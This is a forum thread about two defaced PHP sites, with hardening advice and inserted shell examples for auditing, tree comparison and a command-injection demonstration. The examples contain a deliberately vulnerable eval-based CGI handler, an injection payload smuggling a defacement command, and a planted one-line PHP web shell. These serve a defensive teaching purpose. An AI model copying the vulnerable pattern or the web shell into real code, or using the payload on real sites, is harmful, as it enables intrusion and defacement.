website defacement

Thread: website defacement

  1. #1
    Junior Member
    Join Date
    Sep 2003
    Posts
    3

    website defacement

    Recently I've had 2 websites defaced. Both run php/mySQL.
    In one, the index.php was replaced or overwritten with the message:
    "Tech Team ownz u FreeBSD"
    My host for that site uses the FreeBSD OS.

    On the other site, they replaced or overwrote my index.html with the message:
    "Tech Team ownz your box."

    How would these folks go about doing this? I really want to take measures so it doesn't happen again.
    Thanks

  2. #2
    Senior Member
    Join Date
    Mar 2003
    Posts
    301
    The only real measures you can take are to turn off any unnecessary services and update all the patches for your systems. Well, actually, your host would have to do that unless you work at it. I would give them a call and try to get them to sort it all out.

    PeacE
    -BoB
    #!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
    ($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
    Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
    ,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)

  3. #3
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    Actually, without knowing the setup, the first thing that comes to mind is permissions. Directory permissions should only be 711 (rwx--x--x) and files should only be 744 (rwxr--r--). I'd also check for any trojans or other items running before doing any patches. Remove any potential "repeat" type items that could cause the site to be defaced again. Get rid of any unused services (no, you don't need games, email, etc. running on the server). Check history files and logs. You need to find out first the how of what they did before you lock it down (which should be done before the machine is connected to the Net).

    Download patches, disconnect machine, update machine, restart services, double check no extra "things" running and reconnect. Do regular checks of logs and activities of users on the system.
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage
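The audit MsMittens describes (permissions first, then what changed, then what is listening) as an added example in POSIX shell; this is not code from the thread or from any poster. It assumes the 755-directory / 644-file baseline the original poster reports, and the sample tree that demo_tree builds is constructed for the demo, so point audit_webroot at the real DocumentRoot instead. Nothing here modifies the tree it audits.

```shell
#!/bin/sh
# Added example (not from the thread): first-pass audit of a web root.
# Runs on Linux or FreeBSD with a POSIX sh; reads only, never writes.

# audit_webroot DIR [DAYS]
#   Prints one line per finding and returns the number of findings (0 = clean):
#   WRITABLE  entry writable by group or other (a script running as the web
#             server user can overwrite index.php through these)
#   DIRMODE   directory whose mode is not 755
#   FILEMODE  regular file whose mode is not 644
#   RECENT    regular file modified in the last DAYS days (default 7)
audit_webroot() {
    dir=$1
    days=${2:-7}
    report=$(
        find "$dir" \( -perm -020 -o -perm -002 \) | while read -r f; do
            printf 'WRITABLE  %s %s\n' "$(ls -ld "$f" | cut -d' ' -f1)" "$f"
        done
        find "$dir" -type d ! -perm 755 | while read -r f; do
            printf 'DIRMODE   %s\n' "$f"
        done
        find "$dir" -type f ! -perm 644 | while read -r f; do
            printf 'FILEMODE  %s\n' "$f"
        done
        find "$dir" -type f -mtime "-$days" | while read -r f; do
            printf 'RECENT    %s\n' "$f"
        done
    )
    printf '%s\n' "$report"
    n=$(printf '%s\n' "$report" | grep -c .) || true
    return "$n"
}

# listening_services: what is reachable from the network right now; anything
# not needed to serve the site is a candidate for removal. Tries the tools
# found on Linux (ss, netstat) and FreeBSD (sockstat) in turn.
listening_services() {
    if command -v ss >/dev/null 2>&1; then ss -ltnp 2>/dev/null
    elif command -v sockstat >/dev/null 2>&1; then sockstat -4 -6 -l
    elif command -v netstat >/dev/null 2>&1; then netstat -an | grep LISTEN
    else echo "no socket listing tool found" >&2; return 1
    fi
}

# demo_tree: constructed web root (assumption for the demo) with a
# world-writable uploads directory and a defaced page dropped into it.
# Prints the path of the tree.
demo_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/htdocs/cgi-bin" "$root/htdocs/uploads"
    printf '<?php echo "hello"; ?>\n' > "$root/htdocs/index.php"
    printf '#!/bin/sh\necho Content-type: text/plain; echo; echo ok\n' > "$root/htdocs/cgi-bin/form.cgi"
    printf 'Tech Team ownz u FreeBSD\n' > "$root/htdocs/uploads/index.html"
    chmod 755 "$root/htdocs" "$root/htdocs/cgi-bin"
    chmod 644 "$root/htdocs/index.php"
    chmod 755 "$root/htdocs/cgi-bin/form.cgi"       # executable: FILEMODE only
    chmod 777 "$root/htdocs/uploads"                # WRITABLE and DIRMODE
    chmod 666 "$root/htdocs/uploads/index.html"     # WRITABLE, FILEMODE and RECENT
    # age the legitimate files to the thread's date so only the dropped file is RECENT
    touch -t 200309010000 "$root/htdocs/index.php" "$root/htdocs/cgi-bin/form.cgi"
    printf '%s\n' "$root/htdocs"
}

WEBROOT=$(demo_tree)
audit_webroot "$WEBROOT" 7 || echo "$? finding(s) in $WEBROOT"   # 6 findings for the demo tree
listening_services || true
```

The WRITABLE lines are the ones to read first: a web application or CGI running as the server's unprivileged user can only overwrite index.php if that file, or the directory it sits in, is writable by that user, so a 777 directory under the document root is exactly the foothold that turns a script bug into a defacement.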

  4. #4
    AO Decepticon CXGJarrod's Avatar
    Join Date
    Jul 2002
    Posts
    2,038

    Re: website defacement

    Originally posted here by samboll

    My host for that site uses the FreeBSD OS.
    Is this site hosted through a hosting company? If so, then I would look at another company to host your website.
    N00b> STFU i r teh 1337 (english: You must be mistaken, good sir or madam. I believe myself to be quite a good player. On an unrelated matter, I also apparently enjoy math.)

  5. #5
    Banned
    Join Date
    May 2003
    Posts
    1,004
    If you run a commercial site in the US, your host is in a very actionable position.

    If you are paying them, it is not OK that they have failed to secure the site, unless you went through and altered the permissions of your site to allow your default documents to be written to by the web service user/CGI user and uploaded weak scripts.
    Not only that, but since they run FreeBSD they will most likely have an exceptionally difficult time demonstrating that they took due care, as no TFM exists for FreeBSD at this time and they would have needed to create their own _and_ get it approved by someone with clout, which seems unlikely at best since, if they cared that much about security, they 1. would not be running FreeBSD and 2. would not be having their clients' websites defaced.

    If it isn't a commercial website, your losses were likely so small (just replacing the page) that further action probably wouldn't be worth your time.

    catch

  6. #6
    Banned
    Join Date
    Sep 2003
    Posts
    61
    Tech Team ownz u

    I heard of this group, and they are GOOD!
    I mean that they know what they're doing.
    They're a Chinese-based organisation.


    Anyhow, best of luck, and I hope you solve your problem.
    And MsMittens' idea sounds pretty good to me.

    Cheers

  7. #7
    Junior Member
    Join Date
    Sep 2003
    Posts
    3
    Originally posted here by MsMittens
    Actually, without knowing the setup, the first thing that comes to mind is permissions. Directory permissions should only be 711 (rwx--x--x) and files should only be 744 (rwxr--r--). I'd also check for any trojans or other items running before doing any patches. Remove any potential "repeat" type items that could cause the site to be defaced again. Get rid of any unused services (no, you don't need games, email, etc. running on the server). Check history files and logs. You need to find out first the how of what they did before you lock it down (which should be done before the machine is connected to the Net).

    Download patches, disconnect machine, update machine, restart services, double check no extra "things" running and reconnect. Do regular checks of logs and activities of users on the system.
    This sounds sensible. My current directory permissions are 755 and files are 644.

    Also, I was wondering about the FreeBSD. My host will move me to Linux on Apache if I so desire. Would this be worth it?

  8. #8
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    Well it's not going to make a difference if the host isn't locking down FreeBSD. Often errors done on one OS are carried over to others. Have you asked them how the defacement occurred and if they have fixed the problem?

  9. #9
    Senior Member
    Join Date
    Jan 2002
    Posts
    1,207
    Unlike what the other posters suggest (locking down the system), I suggest that you reformat all the affected (or possibly affected) boxes. This might of course include your entire hosting operation. If there is any possibility that the attackers compromised a machine, it MUST be reformatted.

    Patching an already compromised system is closing the door after the horse has bolted.

    No ... seriously ... any intruder may have left any number of back doors, not all of which you may be able to detect. So no amount of patching will necessarily help, as the attacker could come straight back in through one of their back doors.

    Also, they could have used one machine as a springboard to attack your other boxes (thus avoiding your firewall). So you can't take any chances.

    Because they defaced sites, however, I'd suggest kiddies rather than real skilled individuals. Bear in mind that they probably started the attack by compromising your PHP application, so ensure that you audit it carefully.

    Restoring backups is also a tricky process. You should take great care not to restore any executable content (this of course includes PHP scripts and their include files etc.) from a backup taken after the compromise.

    If you can, take the code from a copy held on an uncompromised box (for example, a staging server or development machine).

    Data should be audited very carefully to spot any surprises they may have left ... at the very least you should check any user databases to see if there are any extra users in, and probably should force a password change on everybody to be on the safe side.
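The restore check this post calls for, as an added example in POSIX shell rather than anything from the thread: compare the post-compromise tree (whether still deployed or pulled from a backup) against the copy held on an uncompromised box, and tag executable content separately so it is never copied back. Both trees, the file names and the dropped backdoor are constructed for the demo; the digest wrapper assumes either GNU sha256sum or FreeBSD's sha256 is on the box. The user-database side of the audit is a separate database query and is not covered here.

```shell
#!/bin/sh
# Added example (not from the thread): file-level diff of a suspect web tree
# against a clean copy, with executable content called out.

# hash_file FILE -> hex SHA-256 digest (GNU coreutils or FreeBSD tool)
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1" | cut -d' ' -f1
    else sha256 -q "$1"
    fi
}

# manifest DIR -> "digest relative/path" per regular file, sorted by path
manifest() {
    ( cd "$1" && find . -type f | sort | while read -r f; do
        printf '%s %s\n' "$(hash_file "$f")" "${f#./}"
    done )
}

# compare_trees CLEAN SUSPECT
#   Prints "EXEC|DATA ADDED|CHANGED|REMOVED path" lines, where EXEC means a
#   PHP, include, CGI, Perl or shell file, and returns the number of EXEC
#   findings: the files that must come from the clean copy, never the backup.
compare_trees() {
    tmp=$(mktemp -d)
    manifest "$1" > "$tmp/clean"
    manifest "$2" > "$tmp/suspect"
    report=$(
        awk 'FILENAME == ARGV[1] { clean[$2] = $1; next }
             { suspect[$2] = $1 }
             END {
                 for (p in suspect)
                     if (!(p in clean)) print "ADDED", p
                     else if (clean[p] != suspect[p]) print "CHANGED", p
                 for (p in clean) if (!(p in suspect)) print "REMOVED", p
             }' "$tmp/clean" "$tmp/suspect" | sort -k2 |
        while read -r kind path; do
            case "$path" in
                *.php|*.phtml|*.inc|*.cgi|*.pl|*.sh) printf 'EXEC %s %s\n' "$kind" "$path" ;;
                *)                                   printf 'DATA %s %s\n' "$kind" "$path" ;;
            esac
        done
    )
    rm -rf "$tmp"
    printf '%s\n' "$report"
    n=$(printf '%s\n' "$report" | grep -c '^EXEC') || true
    return "$n"
}

# demo_clean: constructed copy of the site as held on a staging box (assumption)
demo_clean() {
    d=$(mktemp -d)
    mkdir "$d/lib" "$d/data"
    printf '<?php include "lib/db.inc"; echo "Welcome"; ?>\n' > "$d/index.php"
    printf '<?php $dsn = "mysql:host=localhost"; ?>\n' > "$d/lib/db.inc"
    printf 'Site news, September 2003\n' > "$d/data/news.txt"
    printf '%s\n' "$d"
}

# demo_suspect: the same site as it looks after the defacement (constructed):
# index.php overwritten, a backdoor dropped under images/, one data file edited
demo_suspect() {
    d=$(demo_clean)
    printf 'Tech Team ownz u FreeBSD\n' > "$d/index.php"
    mkdir "$d/images"
    printf '<?php system($_GET["c"]); ?>\n' > "$d/images/.shell.php"
    printf 'Site news, September 2003\nOwned.\n' > "$d/data/news.txt"
    printf '%s\n' "$d"
}

CLEAN=$(demo_clean)
SUSPECT=$(demo_suspect)
compare_trees "$CLEAN" "$SUSPECT" || echo "$? executable file(s) must not be restored"   # 2 for the demo
```

Read the EXEC lines as the do-not-restore list and the DATA lines as the starting point for the data audit the post describes; a hidden file like images/.shell.php is the kind of back door a patch-and-carry-on approach would leave in place.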

  10. #10
    Senior Member
    Join Date
    Apr 2002
    Posts
    1,050
    TechTeam are from Brazil. Most likely it was a CGI script and they just did "echo TechTeam ownz blah blah > index.html". My suggestion would be to look for any vulnerable CGI scripts on your website and remove them if you're not using them. The access they would have had was probably the nobody account anyway; if that has been locked down and doesn't have wget or compiler rights, you should be fine. Does the admin of the boxes know they were defaced? Has he found the problem at all?
    By the sacred **** of the sacred psychedelic tibetan yeti ....We'll smoke the chinese out
    The 20th century pharoes have the slaves demanding work
    http://muaythaiscotland.com/
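The attack path this post guesses at, as an added example that is not from the thread: a constructed CGI-style page handler that splices a request parameter into a command line a shell re-parses, next to a hardened version that validates the parameter against an allowlist and never hands it to a shell. The handler names, the "?page=" parameter and the throwaway document root built by demo_docroot are all assumptions for the demo; nothing touches a real site.

```shell
#!/bin/sh
# Added example (not from the thread): command injection through a CGI
# parameter, the way a defacement via "echo ... > index.html" typically lands,
# beside the hardened handler.

# demo_docroot -> path of a constructed document root (assumption for the demo)
demo_docroot() {
    d=$(mktemp -d)
    mkdir "$d/pages"
    printf 'Welcome to my site\n' > "$d/index.html"
    printf 'About us\n' > "$d/pages/about.txt"
    printf 'Contact\n' > "$d/pages/contact.txt"
    printf '%s\n' "$d"
}

# show_page_vulnerable DOCROOT PAGE
#   Serves pages/PAGE.txt for a request like "?page=about". The parameter is
#   interpolated into a command string and evaluated, so a value such as
#   'about;echo "Tech Team ownz u FreeBSD" >index.html;#' runs the second
#   command too, with the CGI's privileges (the web server's user, often
#   "nobody") and with the document root as working directory.
show_page_vulnerable() {
    docroot=$1; page=$2
    ( cd "$docroot" && eval "cat pages/$page.txt" )
}

# show_page_hardened DOCROOT PAGE
#   Same job, done safely: reject anything outside [A-Za-z0-9_-] (which also
#   blocks "../"), check the target exists, and pass the path as a single
#   argument so no shell ever re-parses it. Returns 1 on rejection.
show_page_hardened() {
    docroot=$1; page=$2
    case "$page" in
        ''|*[!A-Za-z0-9_-]*) printf 'Status: 400\n\nrejected parameter\n'; return 1 ;;
    esac
    if [ ! -f "$docroot/pages/$page.txt" ]; then
        printf 'Status: 404\n\nno such page\n'; return 1
    fi
    cat "$docroot/pages/$page.txt"
}

# index_intact DOCROOT -> 0 if index.html still carries the original content
index_intact() {
    grep -q '^Welcome to my site$' "$1/index.html"
}

# constructed malicious request parameter
PAYLOAD='about;echo "Tech Team ownz u FreeBSD" >index.html;#'

D1=$(demo_docroot)
show_page_vulnerable "$D1" "$PAYLOAD" 2>/dev/null || true
echo "vulnerable handler: index.html now reads '$(cat "$D1/index.html")'"

D2=$(demo_docroot)
show_page_hardened "$D2" "$PAYLOAD" || true
echo "hardened handler: index.html still reads '$(cat "$D2/index.html")'"
```

The injected command succeeds only because the document root is writable by the user the CGI runs as; the post's second point, locking down that account so it owns nothing under the site and has no wget or compiler, is what turns the same bug from a defacement into a failed write.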
